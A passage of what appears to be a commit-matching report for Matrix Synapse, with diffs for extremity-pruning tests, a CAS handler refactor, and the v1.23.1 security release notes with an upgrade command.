"+ \"auth_events\": [],", + "+ \"origin_server_ts\": self.clock.time_msec(),", + "+ },", + "+ RoomVersions.V6,", + "+ )", + "+", + "+ # Now we persist it with state with a dropped history visibility", + "+ # setting. The state resolution across the old and new event will then", + "+ # include it, and so the resolved state won't match the new state.", + "+ state_before_gap = dict(", + "+ self.get_success(self.state.get_current_state(self.room_id))", + "+ )", + "+ state_before_gap.pop((\"m.room.history_visibility\", \"\"))", + "+", + "+ context = self.get_success(", + "+ self.state.compute_event_context(", + "+ remote_event_2, old_state=state_before_gap.values()", + "+ )", + "+ )", + "+", + "+ self.get_success(self.persistence.persist_event(remote_event_2, context))", + "+", + "+ # Check that we haven't dropped the old extremity.", + "+ self.assert_extremities([self.remote_event_1.event_id, remote_event_2.event_id])", + "+", + "+ def test_prune_gap_if_old(self):", + "+ \"\"\"Test that we drop extremities after a gap when the previous extremity", + "+ is \"old\"", + "+ \"\"\"", + "+", + "+ # Advance the clock for many days to make the old extremity \"old\". We", + "+ # also set the depth to \"lots\".", + "+ self.reactor.advance(7 * 24 * 60 * 60)", + "+", + "+ # Fudge a second event which points to an event we don't have. This is a", + "+ # state event so that the state changes (otherwise we won't prune the", + "+ # extremity as they'll have the same state group).", + "+ remote_event_2 = event_from_pdu_json(", + "+ {", + "+ \"type\": EventTypes.Member,", + "+ \"state_key\": \"@user:other2\",", + "+ \"content\": {\"membership\": Membership.JOIN},", + "+ \"room_id\": self.room_id,", + "+ \"sender\": \"@user:other2\",", + "+ \"depth\": 10000,", + "+ \"prev_events\": [\"$some_unknown_message\"],", + "+ \"auth_events\": [],", + "+ \"origin_server_ts\": self.clock.time_msec(),", + "+ },", + "+ RoomVersions.V6,", + "+ )", + "+", + "+ state_before_gap = self.get_success(self.state.get_current_state(self.room_id))", + "+", + "+ self.persist_event(remote_event_2, state=state_before_gap.values())", + "+", + "+ # Check the new extremity is just the new remote event.", + "+ self.assert_extremities([remote_event_2.event_id])", + "+", + "+ def test_do_not_prune_gap_if_other_server(self):", + "+ \"\"\"Test that we do not drop extremities after a gap when we see an event", + "+ from a different domain.", + "+ \"\"\"", + "+", + "+ # Fudge a second event which points to an event we don't have. This is a", + "+ # state event so that the state changes (otherwise we won't prune the", + "+ # extremity as they'll have the same state group).", + "+ remote_event_2 = event_from_pdu_json(", + "+ {", + "+ \"type\": EventTypes.Member,", + "+ \"state_key\": \"@user:other2\",", + "+ \"content\": {\"membership\": Membership.JOIN},", + "+ \"room_id\": self.room_id,", + "+ \"sender\": \"@user:other2\",", + "+ \"depth\": 10,", + "+ \"prev_events\": [\"$some_unknown_message\"],", + "+ \"auth_events\": [],", + "+ \"origin_server_ts\": self.clock.time_msec(),", + "+ },", + "+ RoomVersions.V6,", + "+ )", + "+", + "+ state_before_gap = self.get_success(self.state.get_current_state(self.room_id))", + "+", + "+ self.persist_event(remote_event_2, state=state_before_gap.values())", + "+", + "+ # Check the new extremity is just the new remote event.", + "+ self.assert_extremities([self.remote_event_1.event_id, remote_event_2.event_id])", + "+", + "+ def test_prune_gap_if_dummy_remote(self):", + "+ \"\"\"Test that we drop extremities after a gap when the previous extremity", + "+ is a local dummy event and only points to remote events.", + "+ \"\"\"", + "+", + "+ body = self.helper.send_event(", + "+ self.room_id, type=EventTypes.Dummy, content={}, tok=self.token", + "+ )", + "+ local_message_event_id = body[\"event_id\"]", + "+ self.assert_extremities([local_message_event_id])", + "+", + "+ # Advance the clock for many days to make the old extremity \"old\". We", + "+ # also set the depth to \"lots\".", + "+ self.reactor.advance(7 * 24 * 60 * 60)", + "+", + "+ # Fudge a second event which points to an event we don't have. This is a", + "+ # state event so that the state changes (otherwise we won't prune the", + "+ # extremity as they'll have the same state group).", + "+ remote_event_2 = event_from_pdu_json(", + "+ {", + "+ \"type\": EventTypes.Member,", + "+ \"state_key\": \"@user:other2\",", + "+ \"content\": {\"membership\": Membership.JOIN},", + "+ \"room_id\": self.room_id,", + "+ \"sender\": \"@user:other2\",", + "+ \"depth\": 10000,", + "+ \"prev_events\": [\"$some_unknown_message\"],", + "+ \"auth_events\": [],", + "+ \"origin_server_ts\": self.clock.time_msec(),", + "+ },", + "+ RoomVersions.V6,", + "+ )", + "+", + "+ state_before_gap = self.get_success(self.state.get_current_state(self.room_id))", + "+", + "+ self.persist_event(remote_event_2, state=state_before_gap.values())", + "+", + "+ # Check the new extremity is just the new remote event.", + "+ self.assert_extremities([remote_event_2.event_id])", + "+", + "+ def test_prune_gap_if_dummy_local(self):", + "+ \"\"\"Test that we don't drop extremities after a gap when the previous", + "+ extremity is a local dummy event and points to local events.", + "+ \"\"\"", + "+", + "+ body = self.helper.send(self.room_id, body=\"Test\", tok=self.token)", + "+", + "+ body = self.helper.send_event(", + "+ self.room_id, type=EventTypes.Dummy, content={}, tok=self.token", + "+ )", + "+ local_message_event_id = body[\"event_id\"]", + "+ self.assert_extremities([local_message_event_id])", + "+", + "+ # Advance the clock for many days to make the old extremity \"old\". We", + "+ # also set the depth to \"lots\".", + "+ self.reactor.advance(7 * 24 * 60 * 60)", + "+", + "+ # Fudge a second event which points to an event we don't have. This is a", + "+ # state event so that the state changes (otherwise we won't prune the", + "+ # extremity as they'll have the same state group).", + "+ remote_event_2 = event_from_pdu_json(", + "+ {", + "+ \"type\": EventTypes.Member,", + "+ \"state_key\": \"@user:other2\",", + "+ \"content\": {\"membership\": Membership.JOIN},", + "+ \"room_id\": self.room_id,", + "+ \"sender\": \"@user:other2\",", + "+ \"depth\": 10000,", + "+ \"prev_events\": [\"$some_unknown_message\"],", + "+ \"auth_events\": [],", + "+ \"origin_server_ts\": self.clock.time_msec(),", + "+ },", + "+ RoomVersions.V6,", + "+ )", + "+", + "+ state_before_gap = self.get_success(self.state.get_current_state(self.room_id))", + "+", + "+ self.persist_event(remote_event_2, state=state_before_gap.values())", + "+", + "+ # Check the new extremity is just the new remote event.", + "+ self.assert_extremities([remote_event_2.event_id, local_message_event_id])", + "+", + "+ def test_do_not_prune_gap_if_not_dummy(self):", + "+ \"\"\"Test that we do not drop extremities after a gap when the previous extremity", + "+ is not a dummy event.", + "+ \"\"\"", + "+", + "+ body = self.helper.send(self.room_id, body=\"test\", tok=self.token)", + "+ local_message_event_id = body[\"event_id\"]", + "+ self.assert_extremities([local_message_event_id])", + "+", + "+ # Fudge a second event which points to an event we don't have. This is a", + "+ # state event so that the state changes (otherwise we won't prune the", + "+ # extremity as they'll have the same state group).", + "+ remote_event_2 = event_from_pdu_json(", + "+ {", + "+ \"type\": EventTypes.Member,", + "+ \"state_key\": \"@user:other2\",", + "+ \"content\": {\"membership\": Membership.JOIN},", + "+ \"room_id\": self.room_id,", + "+ \"sender\": \"@user:other2\",", + "+ \"depth\": 10000,", + "+ \"prev_events\": [\"$some_unknown_message\"],", + "+ \"auth_events\": [],", + "+ \"origin_server_ts\": self.clock.time_msec(),", + "+ },", + "+ RoomVersions.V6,", + "+ )", + "+", + "+ state_before_gap = self.get_success(self.state.get_current_state(self.room_id))", + "+", + "+ self.persist_event(remote_event_2, state=state_before_gap.values())", + "+", + "+ # Check the new extremity is just the new remote event.", + "+ self.assert_extremities([local_message_event_id, remote_event_2.event_id])" + ], + "changed_files": [ + "changelog.d/8929.misc", + "synapse/api/constants.py", + "synapse/handlers/message.py", + "synapse/storage/persist_events.py", + "synapse/visibility.py", + "tests/storage/test_events.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8929": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8929, 8929", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8929", + "relevance": 2 + } + ] + }, + { + "commit_id": "4218473f9ea6a2680c21e96368dfe9c06271c8a4", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608314985, + "hunks": 24, + "message": "Refactor the CAS handler in prep for using the abstracted SSO code. (#8958) This makes the CAS handler look more like the SAML/OIDC handlers: * Render errors to users instead of throwing JSON errors. * Internal reorganization.", + "diff": [ + "diff --git a/changelog.d/8958.misc b/changelog.d/8958.misc", + "new file mode 100644", + "index 000000000..1507073e4", + "--- /dev/null", + "+++ b/changelog.d/8958.misc", + "@@ -0,0 +1 @@", + "+Properly store the mapping of external ID to Matrix ID for CAS users.", + "diff --git a/synapse/handlers/cas_handler.py b/synapse/handlers/cas_handler.py", + "index f4ea0a976..e9891e131 100644", + "--- a/synapse/handlers/cas_handler.py", + "+++ b/synapse/handlers/cas_handler.py", + "@@ -15,9 +15,11 @@", + " import logging", + "-import urllib", + "-from typing import TYPE_CHECKING, Dict, Optional, Tuple", + "+import urllib.parse", + "+from typing import TYPE_CHECKING, Dict, Optional", + " from xml.etree import ElementTree as ET", + "+import attr", + "+", + " from twisted.web.client import PartialDownloadError", + "-from synapse.api.errors import Codes, LoginError", + "+from synapse.api.errors import HttpResponseException", + " from synapse.http.site import SynapseRequest", + "@@ -31,2 +33,22 @@ logger = logging.getLogger(__name__)", + "+class CasError(Exception):", + "+ \"\"\"Used to catch errors when validating the CAS ticket.", + "+ \"\"\"", + "+", + "+ def __init__(self, error, error_description=None):", + "+ self.error = error", + "+ self.error_description = error_description", + "+", + "+ def __str__(self):", + "+ if self.error_description:", + "+ return \"{}: {}\".format(self.error, self.error_description)", + "+ return self.error", + "+", + "+", + "+@attr.s(slots=True, frozen=True)", + "+class CasResponse:", + "+ username = attr.ib(type=str)", + "+ attributes = attr.ib(type=Dict[str, Optional[str]])", + "+", + "+", + " class CasHandler:", + "@@ -52,2 +74,4 @@ class CasHandler:", + "+ self._sso_handler = hs.get_sso_handler()", + "+", + " def _build_service_param(self, args: Dict[str, str]) -> str:", + "@@ -71,5 +95,5 @@ class CasHandler:", + " self, ticket: str, service_args: Dict[str, str]", + "- ) -> Tuple[str, Optional[str]]:", + "+ ) -> CasResponse:", + " \"\"\"", + "- Validate a CAS ticket with the server, parse the response, and return the user and display name.", + "+ Validate a CAS ticket with the server, and return the parsed the response.", + "@@ -79,2 +103,8 @@ class CasHandler:", + " Should be the same as those passed to `get_redirect_url`.", + "+", + "+ Raises:", + "+ CasError: If there's an error parsing the CAS response.", + "+", + "+ Returns:", + "+ The parsed CAS response.", + " \"\"\"", + "@@ -91,23 +121,14 @@ class CasHandler:", + " body = pde.response", + "+ except HttpResponseException as e:", + "+ description = (", + "+ (", + "+ 'Authorization server responded with a \"{status}\" error '", + "+ \"while exchanging the authorization code.\"", + "+ ).format(status=e.code),", + "+ )", + "+ raise CasError(\"server_error\", description) from e", + "- user, attributes = self._parse_cas_response(body)", + "- displayname = attributes.pop(self._cas_displayname_attribute, None)", + "-", + "- for required_attribute, required_value in self._cas_required_attributes.items():", + "- # If required attribute was not in CAS Response - Forbidden", + "- if required_attribute not in attributes:", + "- raise LoginError(401, \"Unauthorized\", errcode=Codes.UNAUTHORIZED)", + "-", + "- # Also need to check value", + "- if required_value is not None:", + "- actual_value = attributes[required_attribute]", + "- # If required attribute value does not match expected - Forbidden", + "- if required_value != actual_value:", + "- raise LoginError(401, \"Unauthorized\", errcode=Codes.UNAUTHORIZED)", + "-", + "- return user, displayname", + "+ return self._parse_cas_response(body)", + "- def _parse_cas_response(", + "- self, cas_response_body: bytes", + "- ) -> Tuple[str, Dict[str, Optional[str]]]:", + "+ def _parse_cas_response(self, cas_response_body: bytes) -> CasResponse:", + " \"\"\"", + "@@ -118,35 +139,43 @@ class CasHandler:", + "+ Raises:", + "+ CasError: If there's an error parsing the CAS response.", + "+", + " Returns:", + "- A tuple of the user and a mapping of other attributes.", + "+ The parsed CAS response.", + " \"\"\"", + "+", + "+ # Ensure the response is valid.", + "+ root = ET.fromstring(cas_response_body)", + "+ if not root.tag.endswith(\"serviceResponse\"):", + "+ raise CasError(", + "+ \"missing_service_response\",", + "+ \"root of CAS response is not serviceResponse\",", + "+ )", + "+", + "+ success = root[0].tag.endswith(\"authenticationSuccess\")", + "+ if not success:", + "+ raise CasError(\"unsucessful_response\", \"Unsuccessful CAS response\")", + "+", + "+ # Iterate through the nodes and pull out the user and any extra attributes.", + " user = None", + " attributes = {}", + "- try:", + "- root = ET.fromstring(cas_response_body)", + "- if not root.tag.endswith(\"serviceResponse\"):", + "- raise Exception(\"root of CAS response is not serviceResponse\")", + "- success = root[0].tag.endswith(\"authenticationSuccess\")", + "- for child in root[0]:", + "- if child.tag.endswith(\"user\"):", + "- user = child.text", + "- if child.tag.endswith(\"attributes\"):", + "- for attribute in child:", + "- # ElementTree library expands the namespace in", + "- # attribute tags to the full URL of the namespace.", + "- # We don't care about namespace here and it will always", + "- # be encased in curly braces, so we remove them.", + "- tag = attribute.tag", + "- if \"}\" in tag:", + "- tag = tag.split(\"}\")[1]", + "- attributes[tag] = attribute.text", + "- if user is None:", + "- raise Exception(\"CAS response does not contain user\")", + "- except Exception:", + "- logger.exception(\"Error parsing CAS response\")", + "- raise LoginError(401, \"Invalid CAS response\", errcode=Codes.UNAUTHORIZED)", + "- if not success:", + "- raise LoginError(", + "- 401, \"Unsuccessful CAS response\", errcode=Codes.UNAUTHORIZED", + "- )", + "- return user, attributes", + "+ for child in root[0]:", + "+ if child.tag.endswith(\"user\"):", + "+ user = child.text", + "+ if child.tag.endswith(\"attributes\"):", + "+ for attribute in child:", + "+ # ElementTree library expands the namespace in", + "+ # attribute tags to the full URL of the namespace.", + "+ # We don't care about namespace here and it will always", + "+ # be encased in curly braces, so we remove them.", + "+ tag = attribute.tag", + "+ if \"}\" in tag:", + "+ tag = tag.split(\"}\")[1]", + "+ attributes[tag] = attribute.text", + "+", + "+ # Ensure a user was found.", + "+ if user is None:", + "+ raise CasError(\"no_user\", \"CAS response does not contain user\")", + "+", + "+ return CasResponse(user, attributes)", + "@@ -203,3 +232,64 @@ class CasHandler:", + " args[\"session\"] = session", + "- username, user_display_name = await self._validate_ticket(ticket, args)", + "+", + "+ try:", + "+ cas_response = await self._validate_ticket(ticket, args)", + "+ except CasError as e:", + "+ logger.exception(\"Could not validate ticket\")", + "+ self._sso_handler.render_error(request, e.error, e.error_description, 401)", + "+ return", + "+", + "+ await self._handle_cas_response(", + "+ request, cas_response, client_redirect_url, session", + "+ )", + "+", + "+ async def _handle_cas_response(", + "+ self,", + "+ request: SynapseRequest,", + "+ cas_response: CasResponse,", + "+ client_redirect_url: Optional[str],", + "+ session: Optional[str],", + "+ ) -> None:", + "+ \"\"\"Handle a CAS response to a ticket request.", + "+", + "+ Assumes that the response has been validated. Maps the user onto an MXID,", + "+ registering them if necessary, and returns a response to the browser.", + "+", + "+ Args:", + "+ request: the incoming request from the browser. We'll respond to it with an", + "+ HTML page or a redirect", + "+", + "+ cas_response: The parsed CAS response.", + "+", + "+ client_redirect_url: the redirectUrl parameter from the `/cas/ticket` HTTP request, if given.", + "+ This should be the same as the redirectUrl from the original `/login/sso/redirect` request.", + "+", + "+ session: The session parameter from the `/cas/ticket` HTTP request, if given.", + "+ This should be the UI Auth session id.", + "+ \"\"\"", + "+", + "+ # Ensure that the attributes of the logged in user meet the required", + "+ # attributes.", + "+ for required_attribute, required_value in self._cas_required_attributes.items():", + "+ # If required attribute was not in CAS Response - Forbidden", + "+ if required_attribute not in cas_response.attributes:", + "+ self._sso_handler.render_error(", + "+ request,", + "+ \"unauthorised\",", + "+ \"You are not authorised to log in here.\",", + "+ 401,", + "+ )", + "+ return", + "+", + "+ # Also need to check value", + "+ if required_value is not None:", + "+ actual_value = cas_response.attributes[required_attribute]", + "+ # If required attribute value does not match expected - Forbidden", + "+ if required_value != actual_value:", + "+ self._sso_handler.render_error(", + "+ request,", + "+ \"unauthorised\",", + "+ \"You are not authorised to log in here.\",", + "+ 401,", + "+ )", + "+ return", + "@@ -211,3 +301,3 @@ class CasHandler:", + " user_id = await self._map_cas_user_to_matrix_user(", + "- username, user_display_name, user_agent, ip_address", + "+ cas_response, user_agent, ip_address", + " )", + "@@ -227,7 +317,3 @@ class CasHandler:", + " async def _map_cas_user_to_matrix_user(", + "- self,", + "- remote_user_id: str,", + "- display_name: Optional[str],", + "- user_agent: str,", + "- ip_address: str,", + "+ self, cas_response: CasResponse, user_agent: str, ip_address: str,", + " ) -> str:", + "@@ -237,4 +323,3 @@ class CasHandler:", + " Args:", + "- remote_user_id: The username from the CAS response.", + "- display_name: The display name from the CAS response.", + "+ cas_response: The parsed CAS response.", + " user_agent: The user agent of the client making the request.", + "@@ -246,3 +331,3 @@ class CasHandler:", + "- localpart = map_username_to_mxid_localpart(remote_user_id)", + "+ localpart = map_username_to_mxid_localpart(cas_response.username)", + " user_id = UserID(localpart, self._hostname).to_string()", + "@@ -250,2 +335,4 @@ class CasHandler:", + "+ displayname = cas_response.attributes.get(self._cas_displayname_attribute, None)", + "+", + " # If the user does not exist, register it.", + "@@ -254,3 +341,3 @@ class CasHandler:", + " localpart=localpart,", + "- default_display_name=display_name,", + "+ default_display_name=displayname,", + " user_agent_ips=[(user_agent, ip_address)],", + "diff --git a/synapse/handlers/sso.py b/synapse/handlers/sso.py", + "index 548b02211..b0a8c8c7d 100644", + "--- a/synapse/handlers/sso.py", + "+++ b/synapse/handlers/sso.py", + "@@ -103,3 +103,7 @@ class SsoHandler:", + " def render_error(", + "- self, request, error: str, error_description: Optional[str] = None", + "+ self,", + "+ request: Request,", + "+ error: str,", + "+ error_description: Optional[str] = None,", + "+ code: int = 400,", + " ) -> None:", + "@@ -115,2 +119,3 @@ class SsoHandler:", + " error_description: A human-readable description of the error.", + "+ code: The integer error code (an HTTP response code)", + " \"\"\"", + "@@ -119,3 +124,3 @@ class SsoHandler:", + " )", + "- respond_with_html(request, 400, html)", + "+ respond_with_html(request, code, html)" + ], + "changed_files": [ + "changelog.d/8958.misc", + "synapse/handlers/cas_handler.py", + "synapse/handlers/sso.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8958": "Use the abstract registration code for CAS #8856" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8958, 8958", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8958", + "relevance": 2 + } + ] + }, + { + "commit_id": "320e8c806462b2c65713d3fe26ac9d8674a019bf", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607513396, + "hunks": 3, + "message": "Merge tag 'v1.23.1' Synapse 1.23.1 (2020-12-09) =========================== Due to the two security issues highlighted below, server administrators are encouraged to update Synapse. We are not aware of these vulnerabilities being exploited in the wild. Security advisory ----------------- The following issues are fixed in v1.23.1 and v1.24.0. - There is a denial of service attack ([CVE-2020-26257](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26257)) against the federation APIs in which future events will not be correctly sent to other servers over federation. This affects all servers that participate in open federation. (Fixed in [#8776](https://github.com/matrix-org/synapse/pull/8776)). - Synapse may be affected by OpenSSL [CVE-2020-1971](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1971). Synapse administrators should ensure that they have the latest versions of the cryptography Python package installed. To upgrade Synapse along with the cryptography package: * Administrators using the [`matrix.org` Docker image](https://hub.docker.com/r/matrixdotorg/synapse/) or the [Debian/Ubuntu packages from `matrix.org`](https://github.com/matrix-org/synapse/blob/master/INSTALL.md#matrixorg-packages) should ensure that they have version 1.24.0 or 1.23.1 installed: these images include the updated packages. * Administrators who have [installed Synapse from source](https://github.com/matrix-org/synapse/blob/master/INSTALL.md#installing-from-source) should upgrade the cryptography package within their virtualenv by running: ```sh /bin/pip install 'cryptography>=3.3' ``` * Administrators who have installed Synapse from distribution packages should consult the information from their distributions. Bugfixes -------- - Fix a bug in some federation APIs which could lead to unexpected behaviour if different parameters were set in the URI and the request body. ([\\#8776](https://github.com/matrix-org/synapse/issues/8776)) Internal Changes ---------------- - Add a maximum version for pysaml2 on Python 3.5. ([\\#8898](https://github.com/matrix-org/synapse/issues/8898))", + 